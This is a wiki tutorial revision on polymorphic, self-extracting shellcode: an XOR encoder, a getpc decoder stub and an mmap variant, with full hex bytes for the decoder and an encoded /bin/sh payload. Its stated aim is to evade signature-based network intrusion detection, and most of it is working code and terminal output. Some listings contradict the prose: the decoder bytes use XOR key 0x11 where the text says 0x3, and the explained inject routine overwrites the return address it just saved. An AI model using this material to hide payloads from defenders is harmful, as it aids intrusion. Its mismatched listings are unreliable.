Difference between revisions of "Shellcode/Self-modifying"
Revision as of 11:08, 26 November 2012
Polymorphic and other self-modifying (such as self-extracting) shellcode can be used to obfuscate or help prevent the reverse engineering of the shellcode. Additionally, it can help to prevent signature-based shellcode recognition on the network layer by NIDS or NIPS systems. The example in this article is based on shellcode loaders (sources).
The encoder
An XOR encoding will be used for this, but the method can easily be expanded. Many encoding, encryption, and compression schemes could be implemented with instructions such as xor, inc, dec, add, sub, imul, idiv, or any other operation that can be reversed to recover the original bytes; this is just a small example. For this encoder, each byte is XOR'd with 0x3 and written back into the buffer in a loop. The encoder's output can be written to a file or piped to hexdump or ndisasm for further analysis.
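The reversibility requirement can be illustrated outside of assembly. The following Python sketch is only a model of the idea, not part of the encoder; the function names are hypothetical. It shows that XOR with a single-byte key undoes itself, and that an add encoding is undone by the matching sub:

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def add_bytes(data: bytes, key: int) -> bytes:
    """Add the key to every byte, wrapping at 8 bits like the add instruction."""
    return bytes((b + key) & 0xFF for b in data)


def sub_bytes(data: bytes, key: int) -> bytes:
    """Inverse of add_bytes: subtract the key from every byte, wrapping at 8 bits."""
    return bytes((b - key) & 0xFF for b in data)


sample = bytes([0x48, 0x31, 0xFF])   # first three bytes of the example shellcode
encoded = xor_bytes(sample, 0x03)
print(encoded.hex())                 # 4b32fc
print(xor_bytes(encoded, 0x03) == sample)
```

The encoded bytes match the start of the encoded output shown later in the usage example.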
64 bit
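    count_chars:
        cmpb %dil, (%rbx, %rsi, 1)    # is the current byte zero (end of argument)?
        je write
        xorb $0x3, (%rbx, %rsi, 1)    # encode the byte in place
        inc %rsi                      # advance the counter
        jmp count_chars               # counts characters and xor encodes them

    write:
        mov $0x1, %rax                # write syscall number
        mov $0x1, %rdi                # file descriptor 1 (stdout)
        mov %rsi, %rdx                # number of bytes to write
        mov %rbx, %rsi                # address of the encoded buffer
        syscall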
In this 64 bit snippet of the encoder (source), the length of the shellcode (passed as a command line argument) is counted while it is encoded. %dil, the lowest byte of the %rdi register, holds zero and is compared against the current byte of the argument, whose address is stored in %rbx. If the tested byte is zero, the end of the argument has been reached and the code jumps to the write label to print the encoded output. Otherwise the byte is XOR'd with 0x3, the counter stored in %rsi is incremented, and the code jumps back to the count_chars label. Note that 0x3 was chosen because the shellcode used does not contain this byte; a 0x3 byte would encode to a null byte, so a different key must be chosen if the shellcode contains 0x3. The length must be counted because the write syscall needs to know the number of bytes to print, so instead of looping once to count the characters and again to encode them, the two passes are combined for efficiency.
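The single pass described above can be modelled in a few lines of Python. This is a sketch under the assumption that the input buffer ends with a zero byte, as a command line argument does; encode_and_count and key_is_safe are hypothetical names, not functions from the encoder source:

```python
def encode_and_count(buf: bytearray, key: int = 0x03) -> int:
    """Encode a zero-terminated buffer in place and return the payload length."""
    i = 0
    while buf[i] != 0:   # cmpb %dil, (%rbx, %rsi, 1) / je write
        buf[i] ^= key    # xor $0x3, (%rbx, %rsi, 1)
        i += 1           # inc %rsi
    return i


def key_is_safe(payload: bytes, key: int) -> bool:
    """A payload byte equal to the key would encode to 0x00, so reject such keys."""
    return key not in payload


buf = bytearray(b"\x48\x31\xff\x00")   # three payload bytes plus the terminating zero
length = encode_and_count(buf)
print(length, buf[:length].hex())      # 3 4b32fc
```

Checking the key with key_is_safe before encoding mirrors the note about 0x3: a key that occurs in the payload is the one case where the encoded output would contain a null byte.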
32 bit
    count_chars:
        cmpb %dl, (%ecx, %ebx, 1)
        je write
        xorb $0x3, (%ecx, %ebx, 1)
        inc %ebx
        jmp count_chars               # counts characters and xor encodes them

    write:
        push $4
        pop %eax                      # write syscall number
        mov %ebx, %edx                # number of bytes to write
        push $2
        pop %ebx                      # file descriptor 2
        int $0x80
The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code, so %dl (the lowest byte of %edx) is used in its place. The other difference is the write label, which uses the 32 bit system call convention for write instead of the 64 bit calling convention.
The unpacker
Next, an unpacker is necessary. It is essentially the same as the loader code, with some changes.
First, the shellcode must be read from the stack instead of from the command line arguments. To do this, a getpc function needs to be implemented to retrieve the current instruction pointer so that the shellcode can be found on the stack. When calling forwards, the small positive displacement encoded in the call instruction introduces null bytes; calling backwards produces a negative displacement and avoids them, and it is preferable for other reasons as well (including the call stack). So, the code starts with a "jmp start" instruction that jumps forward over getpc, allowing start to call backwards.
    jmp start
Getpc is called and the address of the next instruction is returned in %eax or %rbx, depending on the architecture. The number of bytes in the rest of the decoder code is then added to this address, which gives the absolute address of the encoded shellcode on the stack. To find this offset, the decoder must be completed and then run through objdump. From there, subtract the address immediately after the getpc call from the end address of the decoder (the address of the last instruction plus the length of that instruction).
For example:
    0804807b <start>:
     804807b:  e8 f7 ff ff ff    call 8048077 <getpc>
     8048080:  89 c2             mov %eax,%edx
     8048082:  83 c2 2a          add $0x2a,%edx
     #shortened for easier reading
     80480a8:  cd 80             int $0x80
The address returned from the getpc call would be 8048080. The last instruction in the application is at 80480a8; since it is a 2 byte instruction, two bytes are added, so the real end address of the decoder in this example is 80480aa. Subtracting the returned address from the end address gives the offset to add: in this case 0xAA - 0x80, which is 0x2A.
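The same arithmetic, written out as a small Python check using the addresses from the objdump listing above (the variable names are only illustrative):

```python
getpc_return = 0x8048080     # address returned by getpc (the instruction after the call)
last_insn_addr = 0x80480A8   # address of the final instruction, int $0x80
last_insn_len = 2            # "cd 80" is two bytes long

decoder_end = last_insn_addr + last_insn_len
offset = decoder_end - getpc_return

print(hex(decoder_end))      # 0x80480aa
print(hex(offset))           # 0x2a
```

The result matches the operand of the add $0x2a,%edx instruction in the listing. The offset has to be recomputed whenever the decoder changes length.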
    start:
        call getpc
        add $0x31,%rbx    # add the length of the rest of the decoder to the instruction pointer to get the address of the encoded payload
Next, the address of the shellcode is pushed onto the stack and the "inject" function is called.
        push %rbx      # push address of shellcode
        call inject
The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function; in this case that address is the exit function. The return address (the address of exit) is then popped off of the stack and saved, so that the function can later return into the decoded shellcode instead.
    inject:
        pop %rdi    # pop the return address (to exit)
Then the copying loop is initialized:
        xor %rsi, %rsi    # zero out counter
        push %rsi
        pop %rdi          # copy the zero into %rdi
First, make sure that the end of the encoded shellcode has not been reached. The shellcode in this example is terminated with 0x20; if 0x20 occurs in the encoded shellcode, choose a terminator byte that does not.
    inject_loop:
        cmpb $0x20, (%rax, %rsi, 1)
        je inject_finished
If not, decode a single byte by XOR'ing it against the encode-byte:
        movb (%rax, %rsi, 1), %r10b
        xor $0x3, %r10b
The XOR'd byte is then copied back into the shellcode:
        movb %r10b, (%rax, %rsi, 1)
Now the counter is incremented and the code jumps back to the beginning of inject_loop:
        inc %rsi
        jmp inject_loop
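As a cross-check of the loop logic, here is a minimal Python model of inject_loop. It is a sketch, not the decoder itself; decode_until_terminator is a hypothetical name, and the default key and terminator are the 0x3 and 0x20 values used in this article:

```python
def decode_until_terminator(buf: bytearray, key: int = 0x03, terminator: int = 0x20) -> int:
    """Decode buf in place up to (not including) the terminator; return the decoded length."""
    i = 0
    while buf[i] != terminator:   # cmpb $0x20, (%rax, %rsi, 1) / je inject_finished
        buf[i] ^= key             # movb ..., %r10b / xor $0x3, %r10b / movb %r10b, ...
        i += 1                    # inc %rsi / jmp inject_loop
    return i


buf = bytearray.fromhex("4b32fc20")    # three encoded bytes followed by the terminator
length = decode_until_terminator(buf)
print(length, buf[:length].hex())      # 3 4831ff
```

Because the comparison runs on the bytes before they are decoded, the terminator is matched against the encoded payload, which is why it must not occur there.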
After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode.
    inject_finished:
        inc %rsi
        movb $0xc3, (%rax, %rsi, 1)    # append 0xc3 (the ret opcode)
Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), then pushing the address of the shellcode, and finally executing ret. Because the address of our shellcode now sits on top of the address of exit on our stack, we will return into the shellcode, which will in turn return into our exit function.
        push %rdi    # push original return address onto stack
        push %rax    # push address of shellcode to stack
        ret          # return into shellcode
When the shellcode finishes, it will execute the "ret" instruction we appended (0xc3) and return into exit, exiting cleanly.
Our complete decoder is:
- \xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05
Self-extracting code
Self-extracting shellcode can extract itself into executable memory. To do this, we will perform a call to mmap() as detailed in this section. We will use the same shellcode as before, with some changes. In the start function we call mmap(), which returns the pointer in %rax. We push this pointer onto the stack before the address of the shellcode and call inject. Inside inject we pop this pointer into %rcx, and inside inject_loop we copy the XOR'd byte into the mmap()'d memory instead of back into the shellcode. Finally, we return into the mmap()'d memory instead of the shellcode. The completed code:
    inject_loop:
        cmpb $0x20, (%rax, %rsi, 1)
        je inject_finished
        movb (%rax, %rsi, 1), %r10b
        xor $0x3, %r10b
        movb %r10b, (%rcx, %rsi, 1)
        inc %rsi
        jmp inject_loop

    inject_finished:
        inc %rsi
        movb $0xc3, (%rcx, %rsi, 1)
        push %rdi
        push %rcx
        ret
Tying it together
To use this shellcode, your payload should look like:
[decoder shellcode][encoded payload][0x20]
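The layout can be expressed as a simple concatenation with one sanity check. The Python sketch below is illustrative only: build_payload is a hypothetical helper, and the two-byte decoder passed in the example is a placeholder rather than the real decoder.

```python
def build_payload(decoder: bytes, encoded: bytes, terminator: int = 0x20) -> bytes:
    """Return decoder + encoded payload + terminator, refusing ambiguous terminators."""
    if terminator in encoded:
        # The decoder would stop early at the first occurrence of the terminator.
        raise ValueError("terminator byte occurs inside the encoded payload")
    return decoder + encoded + bytes([terminator])


placeholder_decoder = b"\x90\x90"   # placeholder bytes standing in for the decoder
payload = build_payload(placeholder_decoder, bytes.fromhex("4b32fc"))
print(payload.hex())                # 90904b32fc20
```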
A usage example:
╭─user@host ~
╰─➤ ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05");" |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/ / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
- \x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06
- Add "\x20" to the end of our newly encoded shellcode as a terminator.
- Append the newly terminated shellcode to the decoder shellcode.
- Test the polymorphic code:
╭─user@host ~
╰─➤ ./loader "$(echo -en "\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20")"
[rorschach@bastille ~]$ exit
exit
╭─user@host ~
╰─➤
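The encoded bytes printed by the packer in the usage example can be reproduced independently. This Python check is only a verification aid; it XORs the 34 byte shellcode from the packer command with 0x3 and compares the result with the output shown above:

```python
plain = bytes.fromhex(
    "4831ff6a69580f0557575e5a48bf6a2f62696e2f7368"
    "48c1ef0857545f6a3b580f05"
)
expected = bytes.fromhex(
    "4b32fc696a5b0c0654545d594bbc692c616a6d2c706b"
    "4bc2ec0b54575c69385b0c06"
)

encoded = bytes(b ^ 0x03 for b in plain)

print(len(plain))            # 34
print(encoded == expected)   # True
print(0x03 in plain)         # False: the key does not occur in the shellcode
print(0x20 in encoded)       # False: the terminator does not occur in the encoded bytes
```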
When we encode the 34 byte /bin/sh shellcode and disassemble it, it looks like:
╭─user@host ~
╰─➤ ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05");" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode

shellcode:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:  4b 32 fc                rex.WXB xor %r12b,%dil
   3:  69 6a 5b 0c 06 54 54    imul $0x5454060c,0x5b(%rdx),%ebp
   a:  5d                      pop %rbp
   b:  59                      pop %rcx
   c:  4b bc 69 2c 61 6a 6d    rex.WXB movabs $0x6b702c6d6a612c69,%r12
  13:  2c 70 6b
  16:  4b c2 ec 0b             rex.WXB retq $0xbec
  1a:  54                      push %rsp
  1b:  57                      push %rdi
  1c:  5c                      pop %rsp
  1d:  69 38 5b 0c 06 38       imul $0x38060c5b,(%rax),%edi
╭─user@host ~
╰─➤
This doesn't look anything like an execve() routine. If we disassemble the entire payload we get:
╭─user@host ~
╰─➤ echo -en "\xeb\x2e\x5f\x58\x59\x48\x31\xf6\x56\x5f\x80\x3c\x30\x20\x74\x11\x44\x8a\x14\x30\x41\x80\xf2\x03\x44\x88\x14\x31\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x31\xc3\x57\x51\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x31\x6a\x09\x58\x48\x31\xff\x57\x5e\x48\xff\xc6\x48\xc1\xe6\x12\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x58\x41\x59\x0f\x05\x50\x53\xe8\xa4\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode

shellcode:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:  eb 2e                   jmp 0x30
   2:  5f                      pop %rdi
   3:  58                      pop %rax
   4:  59                      pop %rcx
   5:  48 31 f6                xor %rsi,%rsi
   8:  56                      push %rsi
   9:  5f                      pop %rdi
   a:  80 3c 30 20             cmpb $0x20,(%rax,%rsi,1)
   e:  74 11                   je 0x21
  10:  44 8a 14 30             mov (%rax,%rsi,1),%r10b
  14:  41 80 f2 03             xor $0x3,%r10b
  18:  44 88 14 31             mov %r10b,(%rcx,%rsi,1)
  1c:  48 ff c6                inc %rsi
  1f:  eb e9                   jmp 0xa
  21:  48 ff c6                inc %rsi
  24:  c6 04 31 c3             movb $0xc3,(%rcx,%rsi,1)
  28:  57                      push %rdi
  29:  51                      push %rcx
  2a:  c3                      retq
  2b:  48 8b 1c 24             mov (%rsp),%rbx
  2f:  c3                      retq
  30:  e8 f6 ff ff ff          callq 0x2b
  35:  48 83 c3 31             add $0x31,%rbx
  39:  6a 09                   pushq $0x9
  3b:  58                      pop %rax
  3c:  48 31 ff                xor %rdi,%rdi
  3f:  57                      push %rdi
  40:  5e                      pop %rsi
  41:  48 ff c6                inc %rsi
  44:  48 c1 e6 12             shl $0x12,%rsi
  48:  6a 07                   pushq $0x7
  4a:  5a                      pop %rdx
  4b:  6a 22                   pushq $0x22
  4d:  41 5a                   pop %r10
  4f:  57                      push %rdi
  50:  57                      push %rdi
  51:  41 58                   pop %r8
  53:  41 59                   pop %r9
  55:  0f 05                   syscall
  57:  50                      push %rax
  58:  53                      push %rbx
  59:  e8 a4 ff ff ff          callq 0x2
  5e:  6a 3c                   pushq $0x3c
  60:  58                      pop %rax
  61:  48 31 ff                xor %rdi,%rdi
  64:  0f 05                   syscall
  66:  4b 32 fc                rex.WXB xor %r12b,%dil
  69:  69 6a 5b 0c 06 54 54    imul $0x5454060c,0x5b(%rdx),%ebp
  70:  5d                      pop %rbp
  71:  59                      pop %rcx
  72:  4b bc 69 2c 61 6a 6d    rex.WXB movabs $0x6b702c6d6a612c69,%r12
  79:  2c 70 6b
  7c:  4b c2 ec 0b             rex.WXB retq $0xbec
  80:  54                      push %rsp
  81:  57                      push %rdi
  82:  5c                      pop %rsp
  83:  69 38 5b 0c 06 20       imul $0x20060c5b,(%rax),%edi
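The constants loaded before the first syscall in this listing can be read back as mmap() arguments. The Python sketch below only does that arithmetic; the constant values are the Linux x86-64 ones written out literally (an assumption that the target is Linux x86-64, as in the rest of this article), and the variable names are illustrative.

```python
# Linux x86-64 values, written out literally so the check does not depend on the host
SYS_MMAP, SYS_EXIT = 9, 60
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS = 0x02, 0x20

rax = 0x9          # pushq $0x9 / pop %rax
rsi = 1 << 0x12    # inc %rsi / shl $0x12,%rsi (mapping length)
rdx = 0x7          # pushq $0x7 / pop %rdx (protection)
r10 = 0x22         # pushq $0x22 / pop %r10 (flags)

print(rax == SYS_MMAP)                               # True
print(rsi)                                           # 262144
print(rdx == PROT_READ | PROT_WRITE | PROT_EXEC)     # True
print(r10 == MAP_PRIVATE | MAP_ANONYMOUS)            # True

# getpc returns 0x35 (the instruction after callq 0x2b); adding 0x31 gives 0x66,
# the offset where the encoded payload begins in the listing.
print(hex(0x35 + 0x31))                              # 0x66
```

So the decoder requests a 256 KiB private anonymous mapping that is readable, writable, and executable, and the 0x3c loaded before the final syscall is the exit system call number.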